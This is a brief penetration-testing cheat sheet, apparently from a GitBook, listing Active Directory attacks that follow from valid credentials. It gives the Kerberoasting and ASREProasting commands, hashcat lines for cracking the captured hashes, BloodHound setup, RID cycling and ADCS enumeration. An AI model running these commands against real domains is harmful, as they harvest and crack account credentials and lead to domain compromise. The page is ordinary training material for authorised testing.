githubEdit

Valid Credentials

1) Kerberoasting

Do a Kerberoasting attack

impacket-getUserSPNs -request -dc-ip DC_IP domain/user:password -outputfile kerberoasted.txt

Crack hash

hashcat -a 0 -m 13100 kerberoasted.txt /usr/share/wordlists/rockyou.txt

2) ASREProasting

Do an ASREProasting attack

nxc ldap DC_IP -u user -p password --kdchost DC_IP --asrep

Crack hash

hashcat -m 18200 -a 0 asreproasted.txt /usr/share/wordlists/rockyou.txt

3) Bloodhound

Start neo4j database

sudo neo4j start

Start Bloodhound

sudo bloodhound

Configure your ~/.nxc/nxc.conf file and add the following

Run Bloodhound ingestor remotely

OR use the Python version

If you receive DNS errors, use dnschef

Rerun Bloodhound

Upload the zip file to Bloodhound

Mark your compromised user as "Owned", then use the cypher query "Shortest path from Owned".

4) RID Cycling

Enumerate all valid users within the domain by doing RID Cycling

5) Active Directory Certificate Services (ADCS)

Requirements: User is in the Enrollment Group, Certificate Requesters group, or with Enroll/Autoenroll rights on a template and a Certificate Authority (CA) exists on the domain.

Enumerate vulnerabilities in the ADCS for domain compromise

Then, depending on the scenario (ESC1, ESC4, etc.), go to Active Directory Certificate Services (ADCS) attacks to exploit in detail.

Last updated